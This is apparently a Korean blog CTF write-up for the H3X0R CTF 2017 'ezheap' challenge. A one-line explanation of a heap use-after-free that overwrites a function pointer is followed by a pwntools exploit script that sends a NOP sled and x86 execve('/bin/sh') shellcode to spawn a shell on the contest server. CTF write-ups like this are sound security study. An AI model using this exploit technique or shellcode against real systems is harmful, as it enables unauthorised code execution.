ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • H3X0R CTF ezheap
    CTF 2017. 1. 8. 02:28


    한번 free하게되면 함수포인터가있는곳에 할당이되는데 기존힙에 쉘코드 + 놉을 넣어주고 조작한 함수포인터를 호출하면댐


    from pwn import *
    
    p = remote("52.199.49.117",10003)
    # p = remote("10.211.55.3",11111)
    
    
    
    
    leak = int(p.recv(9),16)
    log.info(hex(leak))
    
    print p.recvuntil(">>>")
    p.sendline("1")
    print p.recvuntil(">>>")
    p.sendline("3")
    
    
    payload = "AAAA"
    p.sendline(payload)
    print p.recvuntil(">>>")
    p.sendline("4")
    print p.recvuntil("Exit?")
    p.sendline("0")
    print p.recvuntil(">>>")
    p.sendline("3")
    
    
    payload = p32(leak+12)
    payload += "\x90"*16
    payload += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
    
    
    
    p.sendline(payload)
    p.interactive()


    'CTF' 카테고리의 다른 글

    H3X0R CTF train_busan  (4) 2017.01.10
    H3X0R CTF comment  (0) 2017.01.09
    H3X0R CTF Be rich  (0) 2017.01.08
    Plaid CTF prodmanager  (0) 2017.01.07
    [BoB CTF] casino  (0) 2017.01.04

    댓글

Designed by Tistory.